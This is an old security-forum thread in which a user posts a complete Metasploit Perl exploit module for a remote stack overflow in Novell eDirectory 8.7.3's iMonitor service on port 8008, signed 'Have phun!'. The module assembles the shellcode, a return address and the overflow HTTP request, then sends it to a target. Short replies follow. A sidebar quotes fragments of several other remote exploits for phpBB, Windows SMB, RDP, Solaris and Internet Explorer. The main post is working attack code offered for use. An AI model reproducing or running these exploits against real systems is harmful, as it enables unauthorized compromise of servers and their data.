Jul 25, 2008

Novell Edirectory Imonitor Remote Buffer Overflow - running on port 8008
Free Web Hosting, No Ads > CONTRIBUTE > Computers > Computer Security Issues & Exploits

free web hosting

Novell Edirectory Imonitor Remote Buffer Overflow - running on port 8008

machinamedia
Aug 21 2005, 11:38 AM
Here's the advisory: http://www.frsirt.com/english/advisories/2005/1403

CODE
package Msf::Exploit::edirectory_imonitor;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'Anonymous',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],
'Priv' => 1,

'AutoOpts' =>
{
'EXITFUNC' => 'thread'
},

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 8008 ],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Payload' =>
{
'Space' => 0x1036,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%",
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in eDirectory 8.7.3 iMonitor
service.
}),

'Refs' =>
[
['BID', 14548],
],

'Targets' =>
[
[ 'Windows (all versions) - eDirectory 8.7.3 iMonitor', 0x63501f15] # pop/pop/ret
],

'Keys' => ['imonitor'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);

if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}

# pop/pop/ret in ndsimon.dlm on our jump to our shellcode
my $req = $shellcode . "\x90\x90\xeb\x04" . pack('V', $target->[1]) .
"\xe9\xbd\xef\xff\xff" . ("B" x 0xD0);
my $request =
"GET /nds/$req HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $target_host:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";

$s->Send($request);

$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
select(undef, undef, undef, 4);

$self->Handler($s);
return;
}

1;


Have phun!

 

 

 


Reply

melkonianarg
Aug 22 2005, 08:52 PM
Ooooo, nasty...hope that has not caused you any problems...

Reply

machinamedia
Aug 23 2005, 06:57 AM
QUOTE(melkonianarg @ Aug 22 2005, 08:52 PM)
Ooooo, nasty...hope that has not caused you any problems...
*



What exactly do you mean? unsure.gif

Reply

melkonianarg
Aug 23 2005, 04:15 PM
Well, do you run one of these servers? Have you been remotely accessed through a network? Does this security threat have any relevance to you?

Reply

machinamedia
Aug 23 2005, 05:51 PM
QUOTE(melkonianarg @ Aug 23 2005, 04:15 PM)
Well, do you run one of these servers? Have you been remotely accessed through a network? Does this security threat have any relevance to you?
*



I thought you were saing that the post caused me problems... That's it! Sorry if you feel so irritated by a simple question and you answer on that sarcastic tone. Next time better don't answer... It's same!

Reply


Got an Opinion! Express your Views! (no registration):-
Add your Reply/ Opinion/ Views/ Comments/ Suggestion/ Questions/ Queries etc.
Posts with decent grammar & English will be accepted and please refrain from profanities.
For asking a Question, We recommend you to sign-up (for free) so that you can track the topic easily.

Nature of your Post*: Opinion/ Reply/ Comments
Question/Query
Feedback to us.
       
Name   Email
Title/Question*

(Maximum characters: 10,000)
You have characters left.
Confirm Code:

Similar Topics

Keywords : novell edirectory imonitor remote buffer overflow running 8008

  1. Microsoft Windows Dhcp Client Service Remote Code Execution Vulnerability - (0)
  2. [exploit] Phpbb 2.0.15 "viewtopic.php" - Remote PHP Code Execution Exploit (3)
    phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit #!/usr/bin/pyth0n print
    "\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by rattle@awarenetwork.org"
    print " well, just because there is none." import sys from urllib2 import Request, urlopen from
    urlparse import urlparse, urlunparse from urllib import quote as quote_plus INITTAG = ' '
    ENDTAG = ' ' def makecmd(cmd): return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd
    ,'chr(%d)'%ord(cmd )) _ex = "%sviewtopic.php?t=%s&highlight=%%27." _ex += ...
  3. Indiatimes Messenger 6.0 Buffer Overflow - Indiatimes Messenger 6.0 Buffer Overflow (3)
    CODE [CODE]Indiatimes Messenger 6.0 Buffer Overflow (Remote) Vulnerable Program
    : Indiatimes Messenger v6.0 (Latest) Vendor URL :
    http://messenger.indiatimes.com/ Exploit Type : Remote DoS (Remote Compromise may also
    be possible) Proof Of Concept: [script] var obj1 = new
    ActiveXObject("MMClient.MunduMessenger.1"); var buf = ""; for(i=0;
    i<1000; i++) {  buf += "A"; } while(obj1.GetServerStatus() !=
    "Logged In"); //wait till login ...
  4. [exploit] Microsoft Server Message Block - (SMB) Remote Exploit (MS05-011) (0)
    Microsoft Server Message Block (SMB) Remote Exploit (MS05-011) /* * Windows SMB Client
    Transaction Response Handling * * MS05-011 * CAN-2005-0045 * * This works against Win2k * *
    cybertronic gmx net * http://www.livejournal.com/users/cybertronic/ * * usage: * gcc -o mssmb_poc
    mssmb_poc.c * ./mssmb_poc * * connect via \\ip * and hit the netbios folder! * *
    ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690, * 0x00000000) * PAGE_FAULT_IN_NONPAGED_AREA *
    * The Client reboots immediately * * Technical Details: * ----------------- * * The driver MRXSMB.S...
  5. [exploit] Microsoft Windows Remote Desktop Dos - (0)
    Microsoft Windows Remote Desktop Protocol DoS Exploit (MS05-041) // Windows XP SP2
    'rdpwd.sys' Remote Kernel DoS // // Discovered by: // Tom Ferris // tommy
    security-protocols com // // Tested on: // Microsoft Windows XP SP2 // // Usage (SPIKE) :
    ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0 // // 8/9/2005 Security-Protocols.com // //
    This program is free software; you can redistribute it and/or modify it under // the terms of the
    GNU General Public License version 2, 1991 as published by // the Free Software Foundation.
    s_block_start("packet_1...
  6. [exploit] Sun Solaris "printd" Daemon - Remote Arbitrary File Deletion (0)
    ## # This file is part of the Metasploit Framework and may be redistributed # according to the
    licenses defined in the Authors field below. In the # case of an unknown or missing license, this
    file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest #
    version of the Framework can always be obtained from metasploit.com. ## package
    Msf::Exploit::solaris_lpd_unlink; use base "Msf::Exploit"; use IO::Socket; use IO::Select; use
    strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'Solaris
    LPD Arbit...
  7. Remote Buffer Overflow Vulnerability In Yahoopops - (2)
    Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS September 22, 2004 Product:
    YahooPOPS! Vendor URL: http://yahoopops.sourceforge.net Version: YahooPOPS v0.4 up to v0.6
    Vulnerability: Remote Buffer overflows Release Date: 27 September 2004 Vendor Status: Informed on
    24 September 2004 Response: no response Description: YahooPOPs! Is an application that provides
    POP3 access to Yahoo! Mail. It is available on the Windows, Linux, Solaris and Mac platforms.
    This application emulates a POP3 & SMTP server. It also enables popular email clie...
  8. Microsoft Internet Explorer "msdds.dll" Remote Cod - Date : 17/08/2005 (1)
    Take a look at this exploit! It's 0-day /tongue.gif' border='0'
    style='vertical-align:middle' alt='tongue.gif' /> Advisory : FrSIRT/ADV-2005-1450 Rated as :
    Critical Note : It is currently unclear whether the "Msdds.dll" library is installed with
    Microsoft Office, Microsoft Visual Studio, or with other applications. More information will be
    provided when further details are available. #!/usr/bin/perl
    ####################################################### # # Microsoft Internet Explorer "Msdds.dll"
    Remote Code Execution Exploit (0day) # # Bindshell on...
  9. Microsoft Windows Plug-and-play Service Remote Ove - (3)
    This is the c code you can compile it with lcc win 32 or gcc or virtual c++ ... /* Windows 2000
    universal exploit for MS05-039 -\x6d\x35\x6c\x30\x6e\x6e\x79- */
    #define WIN32_LEAN_AND_MEAN #include #include #include #include #include #include
    #include #pragma comment(lib, "mpr") #pragma comment(lib, "Rpcrt4") BYTE Data1 =
    {0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
    0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
    0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00, 0x30,0x00,...



Looking for novell, edirectory, imonitor, remote, buffer, overflow, running, port, 8008

Searching Video's for novell, edirectory, imonitor, remote, buffer, overflow, running, port, 8008
advertisement



Novell Edirectory Imonitor Remote Buffer Overflow - running on port 8008



 

 

 

 

ADD REPLY / Got an Opinion! Remove these ADs! RAPID SEARCH! Free Web Hosting [X]
Express your Opinions, Thoughts or Contribute more info. to help others.
Ask your Doubts & Queries to get answers, So that "Together We can help others!" 		Register FREE for AD-FREE forum, Create your own topics, Ask Questions, track topics, setup subscriptions & notifications and Get a Free Website w/ Email and FTP.
500MB Space *No Ads*, CPanel, FTP, PHP, MySQL, EMails - 100% FREE